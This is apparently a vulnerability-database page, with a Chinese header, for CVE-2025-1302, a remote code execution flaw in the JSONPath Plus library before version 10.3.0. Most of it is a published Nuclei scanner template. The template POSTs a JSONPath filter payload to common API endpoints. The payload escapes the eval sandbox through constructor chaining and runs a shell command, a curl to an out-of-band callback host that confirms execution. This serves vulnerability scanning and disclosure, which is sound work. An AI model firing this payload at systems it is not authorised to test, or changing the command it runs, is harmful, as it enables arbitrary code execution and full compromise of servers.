CVE-2025-1302: JSONPath Plus < 10.3.0 - Remote Code Execution

日期: 2025-11-07 | 影响软件: JSONPath Plus | POC: 已公开

漏洞描述

Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534]

PoC代码[已公开]

id: CVE-2025-1302

info:
  name: JSONPath Plus < 10.3.0 - Remote Code Execution
  author: Jaenact
  severity: critical
  description: |
    Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534]
  impact: |
    Attackers can execute arbitrary code on the system, potentially leading to full system compromise.
  remediation: |
    Update to version 10.3.0 or later.
  reference:
    - https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585
    - https://github.com/JSONPath-Plus/JSONPath
    - https://github.com/EQSTLab/CVE-2025-1302
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1302
    - https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1302
    cwe-id: CWE-94
    epss-score: 0.86146
    epss-percentile: 0.99354
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,rce,jsonpath

http:
  - method: POST
    path:
      - "{{BaseURL}}/query"
      - "{{BaseURL}}/jsonpath"
      - "{{BaseURL}}/api/query"
      - "{{BaseURL}}/data"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/filter"
      - "{{BaseURL}}/expression"

    headers:
      Content-Type: application/json

    body: |
      {
        "path":
        "$..[?(p=\"console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())\";Ethan=''[['constructor']][['constructor']](p);Ethan())]"
      }

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":'

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100fa11caac21b09d224fe41126e598e0487ad8785d469d4a70398cd5fd11ff9b79022100ccc41a7135674d356456b2bf88b1a17267b8984eae4f34738fc915260ac00fd2:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-1302.yaml